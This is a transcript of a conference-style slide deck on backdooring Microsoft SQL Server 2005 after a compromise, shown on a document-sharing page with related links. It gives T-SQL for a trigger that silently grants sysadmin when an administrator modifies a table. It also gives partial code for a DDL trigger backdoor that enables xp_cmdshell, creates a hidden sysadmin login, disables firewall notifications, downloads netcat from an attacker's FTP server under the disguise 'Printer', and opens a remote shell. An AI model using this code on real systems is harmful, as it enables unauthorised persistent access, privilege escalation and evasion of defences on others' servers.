Download MSSql server 2005 backdoor

Survey
yes no Was this document useful for you?
   Thank you for your participation!

* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project

page
1
page
2
page
3
page
4
page
5
page
6
page
7
page
8
page
9
page
10
page
11
page
12
page
13
Document related concepts

Database wikipedia , lookup

Microsoft Access wikipedia , lookup

SQL wikipedia , lookup

Open Database Connectivity wikipedia , lookup

Database model wikipedia , lookup

Relational model wikipedia , lookup

Ingres (database) wikipedia , lookup

Microsoft Jet Database Engine wikipedia , lookup

Clusterpoint wikipedia , lookup

Microsoft SQL Server wikipedia , lookup

PL/SQL wikipedia , lookup

Transcript 
MSSQL SERVER 2005
BACKDOOR
Duong Ngo
October 14, 2009
POST-EXPLOITATION
 Got access to a MSSQL box? (SQL injection,
brute force…)
 Privileges: sa / dbo / normal user
 Got all data
 Now what’s next??
Backdoors
 Provide easier access to the compromised
box in the future
 Type of backdoors:
OS backdoors (rootkits),
Web server backdoor ( PHPshell, CGITelnet..)
 So how’s about Database Backdoor?? YES!
SQL Server 2005 Backdoor
 We’ll create a backdoor based on SQLServer
Trigger.
 What’s Trigger?
Database Trigger
 Special kind of stored procedure that
executes automatically when a user attempts
the specified data-modification statement on
the specified table (UPDATE, DELETE,
INSERT..)
 Trigger gets executed under the security
context of who caused trigger to fire!
EXAMPLE – Create trigger
Context: Normal User with Create Trigger permission:
CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR
INSERT, DELETE,UPDATE
AS
EXEC sp_addsrvrolemember @loginame ='Hacker',
@rolename = N'sysadmin‘
EXAMPLE – Trigger got fired
 Context: sa (server admin)
sa> DELETE * FROM tblCustomers
 RESULT??
User: “Hacker” now become sysadmin
What can we do with that?
 Privilege escalation: normal user -> higher
role
 Database backdoor
SQLServer Backdoor features:
 - Execute subsequent commands if current user is 'sa‘
 - Enable xp_cmdshell
 - Create new login 'backdoor' and add it to sysadmin server





role.
- Disable firewall notification mode
- Add ftp to allowed programs list
- Get netcat from attacker ftp server
- Create a directory 'Backdoor_activated' in attacker ftp
server to let attacker knows whenever the backdoor has
been started.
- Open netcat in listen mode attached with sql command
line client Osql.
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR
DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ;
EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor',
@rolename =N'sysadmin'
--disable firewall notification mode
Exec master..xp_cmdshell 'netsh firewall set notifications disable‘
…..
Why DL_DATABASE_LEVEL_EVENTS
Because it consists of all below events:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW
ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION
ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE
DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION
DROP_EVENT_NOTIFICATION
….
….
Our Backdoor’s Code (cont)
-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- After get netcat, add netcat to firewall’s allowedprogram list
SET @cmd = 'netsh firewall add allowedprogram program=' +
@localdir + '\'+ @fileget + ' name=Printer mode=ENABLE
scope=ALL profile=ALL'
Thank You
for listening!!
Related documents
Some Items for online
Some Items for online
Monday March 24 Prof. Sankaran (Thai) Thayumanavan
Monday March 24 Prof. Sankaran (Thai) Thayumanavan
Medieval kingdoms did not become constitutional
Medieval kingdoms did not become constitutional
BUNDLE PROTOCOL
BUNDLE PROTOCOL
Computer Security - Arizona State University
Computer Security - Arizona State University
CSCI6268L24
CSCI6268L24
Backdoor - Computer Science - Research Areas
Backdoor - Computer Science - Research Areas
Backdoor: A System Architecture for Remote Healing
Backdoor: A System Architecture for Remote Healing
Myofascial Trigger Points
Myofascial Trigger Points
The Schmitt Trigger
The Schmitt Trigger
Trigger Point Release and Stretch of the Quadratus Lumborum
Trigger Point Release and Stretch of the Quadratus Lumborum
Firewall Configuration
Firewall Configuration
Slide 1
Slide 1
DLI Watchman® DCA-31™B - Delta
DLI Watchman® DCA-31™B - Delta
BackDoors
BackDoors
What are trigger points
What are trigger points
IT420: Database Management and Organization Triggers and Stored Procedures 24 February 2006
IT420: Database Management and Organization Triggers and Stored Procedures 24 February 2006
Computing q-Horn Strong Backdoor Sets: a preliminary
Computing q-Horn Strong Backdoor Sets: a preliminary
TRIGGER POINT INJECTION What is a Trigger Point? A trigger point
TRIGGER POINT INJECTION What is a Trigger Point? A trigger point
Bots and Botnets - IT Services Technical Notes
Bots and Botnets - IT Services Technical Notes
On the connections between backdoors, restarts, and heavy
On the connections between backdoors, restarts, and heavy
PDF
PDF